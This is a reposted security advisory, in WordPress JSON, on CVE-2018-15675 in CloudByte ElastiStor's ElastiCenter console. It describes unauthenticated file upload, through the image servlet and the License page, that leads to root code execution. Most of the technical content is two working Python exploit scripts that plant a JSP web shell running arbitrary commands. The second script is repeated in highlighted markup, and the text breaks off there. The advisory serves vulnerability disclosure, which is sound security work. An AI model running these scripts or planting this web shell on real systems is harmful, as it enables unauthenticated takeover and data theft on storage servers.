{"id":13181,"date":"2018-08-23T14:19:08","date_gmt":"2018-08-23T22:19:08","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2018\/08\/23\/news-6948\/"},"modified":"2018-08-23T14:19:08","modified_gmt":"2018-08-23T22:19:08","slug":"news-6948","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2018\/08\/23\/news-6948\/","title":{"rendered":"SSD Advisory \u2013 CloudByte ElastiStor OS Unauthenticated Remote Code Execution"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Ori Nimron| Date: Thu, 23 Aug 2018 10:57:33 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<div class=\"pf-content\">\n<p><strong>Vulnerabilities Summary<\/strong><\/p>\n<p>The following advisory describes two vulnerabilities found in ElastiCenter,<br \/> ElastiStor&#8217;s management console, File Injection that leads to unauthenticated remote code execution.<\/p>\n<p>ElastiCenter is the centralized management tool that you use to configure, monitor, manage, and deploy the services provided by CloudByte ElastiStor.<br \/> ElastiCenter lets you:<\/p>\n<ul>\n<li>Use the Graphical User Interface to manage the storage environment<\/li>\n<li>Generate statistical and configuration reports to help troubleshoot<\/li>\n<li>Delegate administration tasks<\/li>\n<li>Track events<\/li>\n<li>Globally control various settings<\/li>\n<\/ul>\n<p><strong>CVE<\/strong><br \/> CVE-2018-15675<\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher has reported this vulnerability to Beyond Security&#8217;s SecuriTeam Secure Disclosure program.<br \/> <span id=\"more-3737\"><\/span><br \/> <strong>Affected systems<\/strong><br \/> CloudByte ElastiStor OS 2.1.0.1269<\/p>\n<p><strong>Vendor Response<\/strong><br \/> After several attempts to email CloudByte, we couldn&#8217;t get any response from the vendor.<\/p>\n<p><strong>Vulnerability Details<\/strong><br \/> ElastiCenter is vulnerable to unrestricted File Upload vulnerability found in \u201cLicense\u201d section and also in the image handling servlet. The purpose of the &#8220;License&#8221; is for administrative users to update the elasticenter license. Image handling servlet is responsible for image upload. Both sections have an upload functionality which could be accessed by unauthenticated remote attackers. Both sections allow to upload any file in any arbitrary location on the elasticenter host OS.<\/p>\n<p>By uploading a JSP file to the server, an attacker can execute it in the server context (in this case &#8220;root&#8221; user).<\/p>\n<p><strong>PoC<\/strong><br \/> The first poc Injects JSP web-shell through the image handling servlet:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5b7f32dbf052d317540932\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-mixed-highlight\" title=\"Contains Mixed Languages\"><\/span><\/p>\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> #!\/usr\/bin\/python  import requests  import sys  from requests.packages.urllib3.exceptions import InsecureRequestWarning    requests.packages.urllib3.disable_warnings(InsecureRequestWarning)    jspshell = &#8220;&#8221;&#8221;&lt;%@ page import=&#8221;java.io.*&#8221; %&gt;  &lt;%     String cmd = request.getParameter(&#8220;cmd&#8221;);     String output = &#8220;&#8221;;     if(cmd != null) {        String s = null;        try {           Process p = Runtime.getRuntime().exec(cmd);           BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));           while((s = sI.readLine()) != null) {              output += s;           }        }        catch(IOException e) {           e.printStackTrace();        }     }  %&gt;  &lt;%=output %&gt;&#8221;&#8221;&#8221;    print(&#8220;ElastiStore Remote RCE PoC&#8221;)  UPPATH = &#8220;\/client\/image&#8221;    if len(sys.argv) &lt; 3:      print(&#8220;Usage :&#8221;)      print(sys.argv[0] + &#8221; &lt;url_to_elasticenter&gt; &lt;cmd&gt;&#8221;)      print(sys.argv[0] + &#8221; https:\/\/192.168.200.200\/ &#8220;uname -a&#8221;&#8221;)      sys.exit(1)    s = requests.session()  xurl = sys.argv[1]  xcmd = sys.argv[2]    files = {&#8216;adminImage&#8217;:(&#8220;v1.jsp&#8221;, jspshell), &#8220;adminType&#8221;:&#8221;v1.jsp&#8221;, &#8220;adminName&#8221;:&#8221;..\/&#8221;,}  g=s.post(xurl+UPPATH, data={}, files=files, verify=False)    resp = s.get(xurl+&#8221;\/client\/images\/v1.jsp?cmd=&#8221;+xcmd, verify=False)  print(resp.content)<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0070 seconds] -->  <\/p>\n<p>Example run of poc1.py:<\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/08\/poc1.png\" data-slb-active=\"1\" data-slb-asset=\"630661773\" data-slb-internal=\"0\" data-slb-group=\"3737\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone  wp-image-3739\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/08\/poc1-300x58.png\" alt=\"\" width=\"616\" height=\"119\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/08\/poc1-300x58.png 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/08\/poc1.png 635w\" sizes=\"auto, (max-width: 616px) 100vw, 616px\" \/><\/a><\/p>\n<p>The second poc Injects JSP web-shell through the \u201cLicense\u201d section:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5b7f32dbf0538609791845\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-mixed-highlight\" title=\"Contains Mixed Languages\"><\/span><\/p>\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> #!\/usr\/bin\/python  import requests  import sys  from requests.packages.urllib3.exceptions import InsecureRequestWarning    requests.packages.urllib3.disable_warnings(InsecureRequestWarning)    jspshell = &#8220;&#8221;&#8221;&lt;%@ page import=&#8221;java.io.*&#8221; %&gt;  &lt;%     String cmd = request.getParameter(&#8220;cmd&#8221;);     String output = &#8220;&#8221;;     if(cmd != null) {        String s = null;        try {           Process p = Runtime.getRuntime().exec(cmd);           BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));           while((s = sI.readLine()) != null) {              output += s;           }        }        catch(IOException e) {           e.printStackTrace();        }     }  %&gt;  &lt;%=output %&gt;&#8221;&#8221;&#8221;    print &#8220;ElastiStore Remote RCE PoC 2&#8221;  UPPATH = &#8220;\/client\/license&#8221;    if len(sys.argv) &lt; 3:      print &#8220;Usage :&#8221;      print sys.argv[0] + &#8221; &lt;url_to_elasticenter&gt; &lt;cmd&gt;&#8221;      print sys.argv[0] + &#8221; https:\/\/192.168.200.200\/ &#8220;uname -a&#8221;&#8221;      sys.exit(1)    xurl = sys.argv[1]  xcmd = sys.argv[2]    s = requests.session()    files = {&#8216;fileToUpload&#8217;:(&#8220;..\/..\/images\/v2.jsp&#8221;, jspshell ), &#8220;mainui&#8221;:&#8221;mainui&#8221;}  g=s.post(xurl+UPPATH, data={}, files=files, verify=False)    resp = s.get(xurl+&#8221;\/client\/images\/v2.jsp?cmd=&#8221;+xcmd, verify=False)  print resp.content<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5b7f32dbf0538609791845-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7f32dbf0538609791845-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7f32dbf0538609791845-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7f32dbf0538609791845-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7f32dbf0538609791845-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7f32dbf0538609791845-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7f32dbf0538609791845-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7f32dbf0538609791845-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7f32dbf0538609791845-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7f32dbf0538609791845-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7f32dbf0538609791845-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7f32dbf0538609791845-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7f32dbf0538609791845-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7f32dbf0538609791845-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7f32dbf0538609791845-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7f32dbf0538609791845-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7f32dbf0538609791845-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7f32dbf0538609791845-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7f32dbf0538609791845-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7f32dbf0538609791845-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7f32dbf0538609791845-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7f32dbf0538609791845-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7f32dbf0538609791845-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7f32dbf0538609791845-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7f32dbf0538609791845-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7f32dbf0538609791845-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7f32dbf0538609791845-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7f32dbf0538609791845-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7f32dbf0538609791845-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7f32dbf0538609791845-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7f32dbf0538609791845-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7f32dbf0538609791845-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7f32dbf0538609791845-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7f32dbf0538609791845-34\">34<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7f32dbf0538609791845-35\">35<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7f32dbf0538609791845-36\">36<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7f32dbf0538609791845-37\">37<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7f32dbf0538609791845-38\">38<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7f32dbf0538609791845-39\">39<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7f32dbf0538609791845-40\">40<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7f32dbf0538609791845-41\">41<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7f32dbf0538609791845-42\">42<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7f32dbf0538609791845-43\">43<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7f32dbf0538609791845-44\">44<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7f32dbf0538609791845-45\">45<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7f32dbf0538609791845-46\">46<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5b7f32dbf0538609791845-1\"><span class=\"crayon-p\">#!\/usr\/bin\/python<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7f32dbf0538609791845-2\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">requests<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7f32dbf0538609791845-3\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">sys<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7f32dbf0538609791845-4\"><span class=\"crayon-e\">from <\/span><span class=\"crayon-v\">requests<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">packages<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">urllib3<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exceptions <\/span><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">InsecureRequestWarning<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7f32dbf0538609791845-5\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7f32dbf0538609791845-6\"><span class=\"crayon-v\">requests<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">packages<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">urllib3<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">disable_warnings<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">InsecureRequestWarning<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7f32dbf0538609791845-7\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7f32dbf0538609791845-8\"><span class=\"crayon-v\">jspshell<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;<span class=\"crayon-ta\">&lt;%<\/span><span class=\"crayon-sy\">@<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">page<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">import<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;java.io.*&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-ta\">%&gt;<\/span><\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7f32dbf0538609791845-9\"><span class=\"crayon-s\"><span class=\"crayon-ta\">&lt;%<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7f32dbf0538609791845-10\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-t\">String<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">cmd<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">request<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">getParameter<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;cmd&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7f32dbf0538609791845-11\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-t\">String<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">output<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7f32dbf0538609791845-12\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">cmd<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">null<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-k\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7f32dbf0538609791845-13\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">String<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">null<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7f32dbf0538609791845-14\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">try<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-k\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7f32dbf0538609791845-15\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-k\">Process<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Runtime<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">getRuntime<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exec<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">cmd<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7f32dbf0538609791845-16\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-i\">BufferedReader<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sI<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">BufferedReader<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-i\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">InputStreamReader<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">getInputStream<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7f32dbf0538609791845-17\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-st\">while<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sI<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">readLine<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">null<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-k\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7f32dbf0538609791845-18\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">output<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7f32dbf0538609791845-19\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-k\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7f32dbf0538609791845-20\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-k\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7f32dbf0538609791845-21\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">catch<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-i\">IOException<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">e<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-k\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7f32dbf0538609791845-22\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">e<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">printStackTrace<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7f32dbf0538609791845-23\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-k\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7f32dbf0538609791845-24\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-k\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7f32dbf0538609791845-25\"><span class=\"crayon-ta\">%&gt;<\/span><\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7f32dbf0538609791845-26\"><span class=\"crayon-s\"><span class=\"crayon-ta\">&lt;%=<\/span><span class=\"crayon-v\">output<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-ta\">%&gt;<\/span>&#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7f32dbf0538609791845-27\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7f32dbf0538609791845-28\"><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;ElastiStore Remote RCE PoC 2&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7f32dbf0538609791845-29\"><span class=\"crayon-v\">UPPATH<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;\/client\/license&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7f32dbf0538609791845-30\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7f32dbf0538609791845-31\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">len<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7f32dbf0538609791845-32\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;Usage :&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7f32dbf0538609791845-33\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">print <\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8221; &lt;url_to_elasticenter&gt; &lt;cmd&gt;&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7f32dbf0538609791845-34\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">print <\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8221; https:\/\/192.168.200.200\/ &#8220;uname -a&#8221;&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7f32dbf0538609791845-35\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" 